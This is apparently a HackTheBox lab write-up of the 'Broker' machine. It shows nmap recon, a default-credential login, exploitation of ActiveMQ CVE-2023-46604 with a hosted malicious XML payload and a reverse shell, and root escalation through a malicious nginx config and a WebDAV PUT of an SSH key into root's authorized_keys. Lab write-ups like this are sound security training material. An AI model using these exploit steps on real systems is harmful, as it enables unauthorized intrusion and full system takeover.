Broker
Walkthrough of the Broker machine – exploiting an unauthenticated RCE in Apache ActiveMQ to gain a foothold as the activemq user, then escalating to root via a sudo misconfiguration on nginx.
Broker - HackTheBox Writeup
Broker is an Easy Linux machine on HackTheBox. It hosts a version of Apache ActiveMQ that is vulnerable to unauthenticated remote code execution, which is used to gain a foothold as the activemq user. A sudo misconfiguration allowing that user to run /usr/sbin/nginx as root — similar to the Zimbra privilege-escalation technique — is then abused to gain full root access.
Box Info
- Name: Broker
- Difficulty: Easy
- OS: Linux
- Release Date: 11 Sep 2023
- Retire Date:
- Creator: TheCyberGeek
Recon
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines
└─👀 ➜ nmap -p- --min-rate 1000 -oA nmap_broker 10.129.230.87
Starting Nmap 7.95 ( https://nmap.org ) at 2026-09-22 07:11 EEST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.85% done; ETC: 07:12 (0:01:10 remaining)
Nmap scan report for 10.129.230.87
Host is up (0.18s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open patrol-snmp
38505/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 69.17 seconds
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines
└─👀 ➜ nmap -p22,80,1883,5672,8161 -sCV -oN broker_deep 10.129.230.87
Starting Nmap 7.95 ( https://nmap.org ) at 2026-09-22 07:13 EEST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.17% done; ETC: 07:14 (0:00:00 remaining)
Nmap scan report for 10.129.230.87
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
1883/tcp open mqtt
| mqtt-subscribe:
| Topics and their most recent payloads:
|_ ActiveMQ/Advisory/Consumer/Topic/#:
5672/tcp open amqp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
Findings
- Port 22: OpenSSH 8.9p1
- Port 80: nginx 1.18.0
- Port 1883: MQTT — default, unencrypted port for the Message Queuing Telemetry Transport protocol used in IoT and machine-to-machine messaging
- Port 5672: default TCP port for plain, unencrypted AMQP (Advanced Message Queuing Protocol)
- Port 8161: default web console/management interface for Apache ActiveMQ (and ActiveMQ Artemis), plus the Jolokia REST API
SSH enumeration
Checked for known vulnerabilities on the SSH version and found nothing:
1
2
3
4
5
6
7
8
9
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines
└─👀 ➜ searchsploit OpenSSH 8.9p1
Exploits: No Results
Shellcodes: No Results
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines
└─👀 ➜ searchsploit 8.9p1
Exploits: No Results
Shellcodes: No Results
Web enumeration
Browsing to the target IP triggered a basic-auth prompt:
Tried admin/admin and it worked:
This gave access to the ActiveMQ web console, which reported version 5.15.15:
That version is vulnerable to CVE-2023-46604, an unauthenticated RCE, with a public POC available:
Initial Access — Apache ActiveMQ Unauthenticated RCE (CVE-2023-46604)
What is this? CVE-2023-46604 is a critical unauthenticated RCE in Apache ActiveMQ’s OpenWire protocol. The broker deserializes an attacker-controlled class name from an OpenWire packet without validation, allowing a crafted
ExceptionResponsepacket to instantiate an arbitrary class — commonlyorg.springframework.context.support.ClassPathXmlApplicationContext— pointed at a remote malicious XML file that executes an OS command via Spring’s bean definitions.
Cloned the exploit repo:
1
2
3
4
5
6
7
8
9
10
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker
└─👀 ➜ git clone https://github.com/strikoder/CVE-2023-46604-ActiveMQ-RCE-Python.git
cd CVE-2023-46604-ActiveMQ-RCE-Python
Cloning into 'CVE-2023-46604-ActiveMQ-RCE-Python'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (26/26), done.
remote: Total 31 (delta 10), reused 12 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (31/31), 1.65 MiB | 1.46 MiB/s, done.
Resolving deltas: 100% (10/10), done.
Generated the malicious XML payload pointed at my IP/listener port:
1
2
3
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker/CVE-2023-46604-ActiveMQ-RCE-Python
└─👀 ➜ python3 generate_poc.py -i 10.10.17.213 -p 4444
[*] PoC XML written to poc-linux.xml
Started a web server to host the payload, and a listener:
1
2
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker/CVE-2023-46604-ActiveMQ-RCE-Python
└─👀 ➜ python3 -m http.server 80
1
2
3
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~
└─👀 ➜ nc -nlvp 4444
listening on [any] 4444 ...
Ran the exploit against the target’s OpenWire port:
1
2
3
4
5
6
7
8
9
10
11
12
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker/CVE-2023-46604-ActiveMQ-RCE-Python
└─👀 ➜ python3 main.py -i 10.129.230.87 -u http://10.10.17.213:80/poc-linux.xml
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|
[*] Target: 10.129.230.87:61616
[*] XML URL: http://10.10.17.213:80/poc-linux.xml
[*] Sending packet: 000000771f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010024687474703a2f2f31302e31302e31372e3231333a38302f706f632d6c696e75782e786d6c
The target fetched the payload:
1
2
3
4
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker/CVE-2023-46604-ActiveMQ-RCE-Python
└─👀 ➜ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.230.87 - - [22/Sep/2026 12:21:43] "GET /poc-linux.xml HTTP/1.1" 200 -
And caught a shell as activemq:
1
2
3
4
5
6
7
8
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~
└─👀 ➜ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.17.213] from (UNKNOWN) [10.129.230.87] 45600
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$ whoami
activemq
Found the user flag:
1
2
activemq@broker:~$ cat user.txt
443274a0056..........
Privilege Escalation — Sudo Misconfiguration on nginx
What is this? If a low-privilege user is granted
sudorights to runnginx(or another service binary with a flexible config option) as root, they can often supply a custom configuration file at invocation time. A config that serves arbitrary files as root — or allows writing to them — turns that sudo rule into full privilege escalation, the same class of misconfiguration seen in the 2022 Zimbra advisory.
Checked sudo -l:
1
2
3
4
5
6
7
8
activemq@broker:~$ sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq could run nginx as root with no password. Using this technique, a custom nginx config serving / with DAV PUT enabled lets an unprivileged user write files anywhere on disk as root — including an SSH key into /root/.ssh/authorized_keys.
Created a malicious config:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1339;
root /;
autoindex on;
dav_methods PUT;
}
}
EOF
Loaded it via the sudo rule:
1
activemq@broker:~$ sudo nginx -c /tmp/nginx_pwn.conf
Generated an SSH keypair:
1
2
3
4
5
6
7
8
9
10
activemq@broker:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/activemq/.ssh/id_rsa):
Created directory '/home/activemq/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/activemq/.ssh/id_rsa
Your public key has been saved in /home/activemq/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:zZwy7ekLGxH49f6AmuaqcRHRKjoRv/xCIp1RJzNo6Vg activemq@broker
Used the DAV-enabled nginx instance to PUT the public key into root’s authorized_keys:
1
2
3
4
activemq@broker:~$ curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 568 0 0 100 568 0 96352 --:--:-- --:--:-- --:--:-- 110k
Copied the private key to my attack machine, fixed permissions, and logged in as root over SSH:
1
2
3
4
5
6
7
8
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker
└─👀 ➜ chmod 600 id_rsa
┌──🦊 T4T4R1S IP ➜ 10.211.55.3 ~/machines/broker
└─👀 ➜ ssh -i id_rsa root@10.129.230.87
...
root@broker:~# whoami
root
Got root.txt:
1
2
root@broker:~# cat root.txt
c549e4163d0000000000000000000
Root obtained. Solved – happy hacking!
Summary / Attack Path Recap
- Nmap reveals SSH plus several Apache ActiveMQ-related ports (1883, 5672, 8161, 61616).
- The ActiveMQ web console (port 8161) is accessible with default credentials
admin/admin, revealing version 5.15.15. - That version is vulnerable to CVE-2023-46604, an unauthenticated RCE in the OpenWire protocol — exploited to get a reverse shell as
activemq. sudo -lshowsactivemqcan run/usr/sbin/nginxas root with no password.- A malicious nginx config with WebDAV
PUTenabled is loaded via sudo, used to write an SSH public key into/root/.ssh/authorized_keys. - SSH in as root using the corresponding private key.
Find me online:
• TryHackMe: t4t4r1s
• HackTheBox: t4t4r1s
• LinkedIn: Mustafa Eltayeb
• X: @mustafa_altayeb




